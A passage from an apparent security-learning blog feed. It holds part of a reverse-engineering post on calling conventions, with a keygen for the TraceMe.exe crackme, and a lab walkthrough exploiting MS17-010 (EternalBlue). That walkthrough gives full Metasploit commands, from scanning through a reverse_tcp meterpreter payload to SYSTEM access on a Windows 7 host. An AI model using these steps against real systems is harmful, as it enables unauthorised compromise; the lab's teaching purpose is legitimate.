class="line">{</span><br><span class="line">    test_function(1, 2, 3, 4);</span><br><span class="line">    return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>In the 64-bit build, <strong>main</strong> passes 1, 2, 3, 4 in the registers <strong>edi, esi, edx, ecx</strong> respectively (the first four integer argument registers of the System V AMD64 ABI, unlike the 32-bit build where all four are pushed on the stack); <strong>test_function</strong> then stores those four registers into its own stack frame.</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiGxP.png" alt="YDiGxP.png"><br><img src="https://s1.ax1x.com/2020/05/14/YDi82t.png" alt="YDi82t.png"><br>+++</p><p>Run to <strong>0x55555555515b</strong>, the call to test_function:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiYKf.png" alt="YDiYKf.png"><br>Step into test_function:</p><p><a href="https://imgchr.com/i/YDiBPs" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/05/14/YDiBPs.png" alt="YDiBPs.png"></a><br>Run to the <strong>pop</strong> instruction:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiNqS.png" alt="YDiNqS.png"><br>The stack at that point:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiaVg.png" alt="YDiaVg.png"><br>The corresponding stack frame (addresses abbreviated to their low 16 bits, all within 0x7fffffffXXXX):</p><table><thead><tr><th>Slot</th><th>Address</th><th>Value (qword)</th></tr></thead><tbody><tr><td>rsp</td><td>e1b0</td><td>0x00007fffffffe1c0</td></tr><tr><td></td><td>e1c0</td><td>0x0000555555555170</td></tr><tr><td>last byte is buffer[0]</td><td>e1d0</td><td>0x0000000000000000</td></tr><tr><td></td><td>e1e0</td><td>0x0000000100040000</td></tr><tr><td>rbp</td><td>e1f0</td><td>0x0000000000000000</td></tr></tbody></table><p>+++</p><h2 id="程序5、TraceMe-exe"><a href="#程序5、TraceMe-exe" class="headerlink" title="Program 5: TraceMe.exe"></a>Program 5: TraceMe.exe</h2><h3 id="汇编代码"><a href="#汇编代码" class="headerlink" title="Assembly"></a>Assembly</h3><p>Locate the program's key code by finding the call to <strong>GetDlgItemTextA</strong>, which reads the user's input from the dialog:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDi38I.png" 
alt="YDi38I.png"><br>输入用户名1234567,序列号08173144;</p><p><img src="https://s1.ax1x.com/2020/05/14/YDiw5j.png" alt="YDiw5j.png"><br>发现eax保存序列号长度,ebx保存用户名长度:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDidaQ.png" alt="YDidaQ.png"><br>test al,al判断用户名第一字节是否为空,空的话跳转。</p><p>分析后得知0X0040138F为跳转判断是否输入正确,如下代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcgC6.png" alt="YDcgC6.png"><br>可以直接按照00401347——00401378写出注册机;</p><p>+++</p><p>序列号生成算法:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><iostream></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">char</span> s[<span class="number">15</span>];</span><br><span class="line"><span class="built_in">cin</span>>>s;</span><br><span class="line"><span class="keyword">char</span> arr[]={<span 
class="number">0x0c</span>,<span class="number">0x0a</span>,<span class="number">0x13</span>,<span class="number">0x09</span>,<span class="number">0x0c</span>,<span class="number">0x0b</span>,<span class="number">0x0a</span>,<span class="number">0x0b</span>};</span><br><span class="line"><span class="keyword">int</span> r=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">int</span> i=<span class="number">3</span>,j=<span class="number">0</span>;j<len;i++,j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(j><span class="number">7</span>)</span><br><span class="line">j=<span class="number">0</span>;</span><br><span class="line">r+=s[i]*arr[j];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<r;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>还是以用户名1234567,得到序列号:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcsER.png" alt="YDcsER.png"><br>Check:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDchKe.png" alt="YDchKe.png"><br>成功!</p><p>+++</p><h2 id="程序六、调用stdcall、fastcall…"><a href="#程序六、调用stdcall、fastcall…" class="headerlink" title="程序六、调用stdcall、fastcall…"></a>程序六、调用<code>stdcall</code>、<code>fastcall</code>…</h2><h3 id="1-stdcall"><a href="#1-stdcall" class="headerlink" title="1.stdcall"></a>1.stdcall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span 
class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">stdcall <span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><blockquote><p>x32dbg</p></blockquote><p><img src="https://s1.ax1x.com/2020/05/14/YDcyU1.png" alt="YDcyU1.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc64x.png" alt="YDc64x.png"></p><h3 id="2-fastcall"><a href="#2-fastcall" class="headerlink" title="2.fastcall"></a>2.fastcall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span 
class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcRgO.png" alt="YDcRgO.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcWvD.png" alt="YDcWvD.png"><br>+++</p><h3 id="3-cdecl"><a href="#3-cdecl" class="headerlink" title="3.cdecl"></a>3.cdecl</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="keyword">void</span> __<span class="function">cdecl 
<span class="title">demo_cdecl</span><span class="params">(<span class="keyword">int</span> x,<span class="keyword">int</span> y,<span class="keyword">int</span> z,<span class="keyword">int</span> w)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> sum=x+y+z+w;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">demo_cdecl(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc4DH.png" alt="YDc4DH.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDcDb9.png" alt="YDcDb9.png"><br>+++</p><h3 id="4-thiscall"><a href="#4-thiscall" class="headerlink" title="4.thiscall"></a>4.thiscall</h3><p>示例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span 
class="title">CSum</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> a+b;</span><br><span class="line">}</span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">CSum sum;</span><br><span class="line">sum.Add(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>汇编代码:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDc28K.png" alt="YDc28K.png"></p><p>被调用方调整栈帧:</p><p><img src="https://s1.ax1x.com/2020/05/14/YD7pCQ.png" alt="YD7pCQ.png"><br>+++</p><h3 id="5-64位操作系统"><a href="#5-64位操作系统" class="headerlink" title="5.64位操作系统"></a>5.64位操作系统</h3><p>示例代码:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> n1,<span 
class="keyword">int</span> n2,<span class="keyword">int</span> n3,<span class="keyword">int</span> n4,<span class="keyword">int</span> n5,<span class="keyword">int</span> n6)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> n1+n2+n3+n4+n5+n6;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%d\r\n"</span>,Add(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>));</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>Main函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTLut.png" alt="YDTLut.png"></p><p>Add函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTz4g.png" alt="YDTz4g.png"></p><p>+++</p><h3 id="6-64位gcc"><a href="#6-64位gcc" class="headerlink" title="6.64位gcc"></a>6.64位gcc</h3><p>main函数,6个参数从左向右放入寄存器:<strong>rdi,rsi,rdx,rcx,r8,r9</strong></p><p><img src="https://s1.ax1x.com/2020/05/14/YDTvE8.png" alt="YDTvE8.png"></p><p>Add函数:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTxUS.png" alt="YDTxUS.png"></p><h3 id="7-虚函数调用"><a href="#7-虚函数调用" class="headerlink" title="7.虚函数调用"></a>7.虚函数调用</h3><p>实例代码:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">CSum</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line"><span class="function"><span class="keyword">virtual</span> <span class="keyword">int</span> <span class="title">Add</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">return</span> a+b;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">virtual</span> <span class="keyword">int</span> <span class="title">Sub</span><span class="params">(<span class="keyword">int</span> a,<span class="keyword">int</span> b)</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">return</span> a-b;</span><br><span class="line"> }</span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> CSum* pCSum=<span class="keyword">new</span> CSum;</span><br><span class="line"> pCSum->Add(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line"> pCSum->Sub(<span 
class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><p>Main函数汇编:</p><p><img src="https://s1.ax1x.com/2020/05/14/YDTXHf.png" alt="YDTXHf.png"></p>]]></content>
<summary type="html">
<h2 id="程序一、字节序"><a href="#程序一、字节序" class="headerlink" title="Program 1: byte order"></a>Program 1: byte order</h2><h3 id="程序源码"><a href="#程序源码" class="headerlink" titl
</summary>
<category term="逆向" scheme="https://singlemindedt.github.io/tags/%E9%80%86%E5%90%91/"/>
</entry>
<entry>
<title>Obtaining a meterpreter shell with EternalBlue</title>
<link href="https://singlemindedt.github.io/2020/05/10/%E5%88%A9%E7%94%A8%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E8%8E%B7%E5%8F%96meterpretershell/"/>
<id>https://singlemindedt.github.io/2020/05/10/利用永恒之蓝获取meterpretershell/</id>
<published>2020-05-10T11:49:35.000Z</published>
<updated>2020-05-11T08:24:25.408Z</updated>
<content type="html"><![CDATA[<p><strong>Lab environment:</strong></p><p>Attacker: Kali (192.168.40.128)</p><p>Target: Win7 (192.168.40.142)</p><p>+++</p><p><strong>Attack procedure:</strong></p><ol><li>Start msf</li></ol><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeXoq.png" alt="YJeXoq.png"></p><ol start="2"><li>Reconnaissance: first determine whether the target has port 445 open and whether MS17-010 is present</li></ol><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">nmap探测主机信息:nmap -sV 192.168.40.142</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeOwn.png" alt="YJeOwn.png"></p><p>Port 445 is open and the target host runs Windows 7, so MS17-010 is presumably present.</p><ol start="3"><li>Verify the vulnerability with an msf auxiliary module</li></ol><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">search ms17-010</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJexYV.png" alt="YJexYV.png"></p><p>Searching for related modules returns 5 results, including remote Windows command execution, remote Windows kernel corruption, code execution and so on; here <code>auxiliary/scanner/smb/smb_ms17_010</code> is used for verification.</p><p>Set the basic options:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line"><span class="built_in">set</span> rhost 192.168.40.142</span><br><span class="line"><span class="built_in">set</span> rport 445</span><br></pre></td></tr></table></figure><p>Run it to check whether the vulnerability is present:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">run</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJebLj.png" alt="YJebLj.png"></p><p>According to the result, the vulnerability is present.</p><ol start="4"><li>Exploitation</li></ol><p>Use the exploit module:</p><ul><li>Set the target address and port, and the local address</li></ul><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">set</span> rhost 192.168.40.142</span><br><span class="line"><span class="built_in">set</span> rport 445</span><br><span class="line"><span class="built_in">set</span> lhost 192.168.40.128</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeHyQ.png" alt="YJeHyQ.png"></p><ul><li>Set the payload</li></ul><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeTSS.png" alt="YJeTSS.png"></p><ul><li>Check that the configuration is complete</li></ul><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJezWT.png" alt="YJezWT.png"></p><p>Under Exploit targets, both Win7 and Server 2008 R2 are listed as applicable.</p><ul><li>Attack</li></ul><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">run</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJe7Qg.png" alt="YJe7Qg.png"></p><p>As shown, we directly obtained SYSTEM privileges on the target and were given a <strong>shell</strong> prompt.</p><p>+++</p><p>Looking back at our payload:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure><p>The intent was to enter <strong>meterpreter</strong> mode, but that is not what happened. After checking the configuration, the reason turned out to be:</p><blockquote><p>Scanners and most other auxiliary modules in Metasploit use the RHOSTS option rather than RHOST</p></blockquote><p>After changing <code>rhost</code> to <code>rhosts</code> in the configuration and launching the attack again, we successfully enter <strong>meterpreter</strong> mode:</p><p><img src="https://s1.ax1x.com/2020/05/11/YJevF0.png" alt="YJevF0.png"></p><p>+++</p><ol start="5"><li>Check the current user's privileges</li></ol><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">meterpreter > getuid</span><br></pre></td></tr></table></figure><p><img src="https://s1.ax1x.com/2020/05/11/YJeLes.png" alt="YJeLes.png"></p><p>As shown, we have obtained <code>NT AUTHORITY\SYSTEM</code> privileges.</p><p>+++</p><blockquote><p><strong>Meterpreter</strong>: </p><p>Meterpreter is an extension module of the Metasploit framework, used as the payload after a successful exploit; once the exploit succeeds, the payload returns a control channel to us. Using it as the payload gives us a Meterpreter shell connection to the target system. As a post-exploitation module, the Meterpreter shell has many useful functions, such as adding a user, hiding things, opening a shell, obtaining user passwords, uploading and downloading files on the remote host, running cmd.exe, capturing the screen, obtaining remote control, capturing keystrokes, clearing applications, displaying the remote host's system information, displaying the remote machine's network interfaces and IP addresses, and so on. In addition, Meterpreter can evade intrusion detection systems. It hides itself on the remote host and does not modify files on the system's hard disk, so a HIDS (host-based intrusion detection system) has difficulty responding to it. Moreover, the system time changes while it runs, so tracking or terminating it becomes very difficult even for an experienced person.</p></blockquote><p>+++</p>]]></content>
<summary type="html">
<p><strong>Lab environment:</strong></p>
<p>Attacker: Kali (192.168.40.128)</p>
<p>Target: Win7 (192.168.40.142)</p>
<p>+++</p>
<p><strong>Attack procedure:</strong></p>
<ol>
<
</summary>
<category term="Demo" scheme="https://singlemindedt.github.io/tags/Demo/"/>
<category term="渗透" scheme="https://singlemindedt.github.io/tags/%E6%B8%97%E9%80%8F/"/>
</entry>
</feed>